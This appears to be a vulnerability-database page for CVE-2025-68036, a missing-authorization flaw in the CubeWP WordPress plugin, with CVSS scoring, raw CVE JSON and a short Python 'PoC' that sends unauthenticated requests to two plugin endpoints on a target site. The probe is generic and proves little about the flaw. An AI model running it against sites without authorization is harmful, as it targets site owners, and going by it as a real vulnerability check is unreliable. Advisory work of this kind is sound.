Security Vulnerability Report
中文
CVE-2025-68036 CVSS 7.5 HIGH

CVE-2025-68036

Published: 2025-12-30 00:15:52
Last Modified: 2026-04-23 15:35:52

Description

Missing Authorization vulnerability in Imran Tauqeer CubeWP cubewp-framework allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects CubeWP: from n/a through <= 1.1.27.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

CubeWP cubewp-framework <= 1.1.27

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-68036 PoC - CubeWP Missing Authorization # Target: WordPress site with CubeWP plugin <= 1.1.27 target = "http://target-site.com" # Identify unprotected CubeWP endpoints endpoints = [ "/wp-json/cubewp/v1/", "/wp-admin/admin-ajax.php", ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" } print("Testing CVE-2025-68036 - CubeWP Missing Authorization") print("Target:", target) # Test each endpoint without authentication for endpoint in endpoints: url = target + endpoint try: response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: print(f"[!] Potentially vulnerable endpoint: {url}") print(f" Status: {response.status_code}") print(f" Response preview: {response.text[:200]}...") except requests.exceptions.RequestException as e: print(f"Error testing {url}: {e}") print("\nPoC completed. Manual verification required.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68036", "sourceIdentifier": "[email protected]", "published": "2025-12-30T00:15:52.047", "lastModified": "2026-04-23T15:35:51.740", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Imran Tauqeer CubeWP cubewp-framework allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects CubeWP: from n/a through <= 1.1.27."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/cubewp-framework/vulnerability/wordpress-cubewp-plugin-1-1-27-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}